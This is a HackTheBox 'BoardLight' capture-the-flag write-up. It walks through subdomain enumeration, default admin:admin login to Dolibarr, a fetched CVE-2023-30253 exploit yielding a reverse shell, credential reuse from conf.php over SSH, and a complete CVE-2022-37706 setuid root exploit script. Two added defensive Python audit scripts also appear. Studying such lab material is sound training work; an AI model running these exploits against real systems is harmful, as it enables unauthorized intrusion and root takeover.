HackTheBox BoardLight Writeup
Explore the fundamentals of cybersecurity in the BoardLight Capture The Flag (CTF) challenge, an easy-level experience, ideal for beginners! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible and perfect for those new to CTFs.
Add Hosts
Edit the /etc/hosts file and add the following entry:
10.10.11.11 board.htb crm.board.htb
Script to add the hosts entry automatically (appends it only if it is not already present):
ip="10.10.11.11"
domain="board.htb crm.board.htb"
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV board.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-22 18:16 CEST
Nmap scan report for board.htb (10.10.11.11)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeration
While exploring the application at http://board.htb/contact.php, the footer reveals the address info@board.htb, which confirms the board.htb domain and suggests looking for further virtual hosts under it.
To enumerate subdomains, use ffuf with the following command:
ffuf -u http://FUZZ.board.htb -c -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
- Discovered subdomain:
- crm.board.htb: [Status: 200, Size: 6360, Words: 397, Lines: 150]
Accessing the CRM subdomain at http://crm.board.htb, you find a Dolibarr 17.0.0 instance.
Testing default credentials, the pair admin:admin is accepted.
Exploitation of Dolibarr (CVE-2023-30253)
Using the CVE-2023-30253 exploit, which affects Dolibarr 17.0.0, you can obtain a reverse shell as the web server user. First start a listener:
nc -lvnp 9001
Then, in a second terminal, fetch and run the exploit against the CRM with the default credentials (the vpnip line picks up your tun0 address for the callback):
git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
mv Exploit-for-Dolibarr-17.0.0-CVE-2023-30253 CVE-2023-30253
cd CVE-2023-30253
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
python3 exploit.py http://crm.board.htb admin admin $vpnip 9001
rm -rf CVE-2023-30253
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm
Database Credentials
Next, check for database credentials by inspecting the configuration file:
grep 'db_' /var/www/html/crm.board.htb/htdocs/conf/conf.php
SSH Access
The database password found in conf.php is reused for the local user larissa, so log in over SSH with it:
ssh larissa@board.htb
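The two steps above (reading the database password out of conf.php and reusing it over SSH) are the attack side of a configuration hygiene problem. The script below is an added example, not part of the writeup and not Dolibarr's own code: it parses the same $dolibarr_main_db_* settings the grep above returns, reports whether the file is readable by group or other, and masks the password so the audit output itself does not leak it. The sample configuration, the user name crm_app and the password value are constructed for the example.

```python
"""Audit a Dolibarr conf.php for exposed database credentials.

Added example, not part of the writeup or of Dolibarr. The sample
configuration below is constructed in the layout Dolibarr uses for
its settings lines.
"""
import os
import re
import stat
import tempfile

# Constructed sample configuration (values are placeholders).
SAMPLE_CONF = """<?php
$dolibarr_main_url_root='http://crm.example.test';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_user='crm_app';
$dolibarr_main_db_pass='constructed-sample-password';
$dolibarr_main_db_type='mysqli';
"""

# Matches lines such as: $dolibarr_main_db_pass='secret';
SETTING_RE = re.compile(
    r"""^\s*\$(dolibarr_main_db_\w+)\s*=\s*(['"])(.*?)\2\s*;""", re.MULTILINE)


def parse_db_settings(text):
    """Return {setting_name: value} for every $dolibarr_main_db_* line."""
    return {name: value for name, _quote, value in SETTING_RE.findall(text)}


def mask(secret):
    """Replace a secret with asterisks of the same length."""
    return "*" * len(secret)


def audit_conf(path):
    """Audit one conf.php: returns {'settings': masked dict, 'findings': [str]}."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(
            f"{path} is readable by group/other (mode {oct(mode)}); "
            "any local account can read the database password")
    with open(path, encoding="utf-8") as fh:
        settings = parse_db_settings(fh.read())
    password = settings.get("dolibarr_main_db_pass", "")
    if not password:
        findings.append("dolibarr_main_db_pass is empty or missing")
    settings["dolibarr_main_db_pass"] = mask(password)
    return {"settings": settings, "findings": findings}


def write_sample_conf(mode):
    """Write SAMPLE_CONF to a temp file with the given mode; returns its path."""
    directory = tempfile.mkdtemp(prefix="dolibarr-audit-")
    path = os.path.join(directory, "conf.php")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CONF)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    # Run the audit once against a world-readable copy and once against a 0600 copy.
    for sample_mode in (0o644, 0o600):
        result = audit_conf(write_sample_conf(sample_mode))
        print(oct(sample_mode), result["settings"]["dolibarr_main_db_user"],
              result["settings"]["dolibarr_main_db_pass"])
        for finding in result["findings"]:
            print("  -", finding)
```

Point audit_conf() at the real path from the writeup to audit a live install; the file-mode finding is the one that matters here, since a readable conf.php is what turns a web-application foothold into reusable credentials. Password reuse between the database account and a shell user cannot be detected from the file alone, but unique, vaulted credentials per service remove that step entirely.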
Privilege Escalation (CVE-2022-37706)
During post-exploitation, LinPEAS identifies Enlightenment as a SUID binary.
Searching for Enlightenment SUID exploits leads to CVE-2022-37706.
To exploit this, run the following script:
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take a few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]; then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
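The finding that made this escalation possible was a setuid enlightenment_sys binary, which LinPEAS surfaced for the attacker. The script below is an added example, not part of the writeup and not LinPEAS code: it is the same discovery as a scheduled defender check, walking a tree for regular files with the setuid bit and flagging any whose name is on a watchlist. The watchlist, the build_sample_tree() layout and the file paths in it are constructed for the example; only the enlightenment_sys name and its CVE come from the writeup.

```python
"""Audit a directory tree for setuid files and flag known-risky names.

Added example, not part of the writeup or of LinPEAS. The watchlist and
the sample tree are constructed; pass a real root such as "/" on the
command line to audit a host.
"""
import os
import stat
import sys
import tempfile

# Constructed watchlist: basename -> reason it deserves attention.
WATCHLIST = {
    "enlightenment_sys": "CVE-2022-37706: setuid Enlightenment helper; patch or drop the setuid bit",
}


def find_setuid(root):
    """Yield (path, st_mode, st_uid) for every regular file under root with the setuid bit."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)       # lstat: do not follow symlinks
            except OSError:
                continue                  # unreadable entry: skip it, do not abort the scan
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode, st.st_uid


def audit_setuid(root):
    """Return {'setuid': [paths], 'flagged': {path: reason}} for the tree at root."""
    setuid, flagged = [], {}
    for path, _mode, _uid in find_setuid(root):
        setuid.append(path)
        reason = WATCHLIST.get(os.path.basename(path))
        if reason:
            flagged[path] = reason
    return {"setuid": sorted(setuid), "flagged": flagged}


def build_sample_tree():
    """Create a constructed tree: two setuid files (one watchlisted) and one normal file."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    layout = {
        "usr/lib/enlightenment/utils/enlightenment_sys": 0o4755,  # watchlisted name
        "usr/bin/passwd": 0o4755,                                 # setuid, but expected
        "usr/bin/ls": 0o755,                                      # not setuid
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write("#!/bin/sh\n")   # placeholder content, not a real binary
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    result = audit_setuid(target)
    for path in result["setuid"]:
        marker = "[!]" if path in result["flagged"] else "[ ]"
        print(marker, path)
        if path in result["flagged"]:
            print("    ", result["flagged"][path])
```

Run it without arguments to see it against the constructed tree, or with a root directory to audit a real host; comparing the sorted setuid list against a known-good baseline on each run catches newly introduced setuid files as well as the watchlisted names.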
Root Access
Once the privilege escalation exploit is successful, access the root flag:
cat /root/root.txt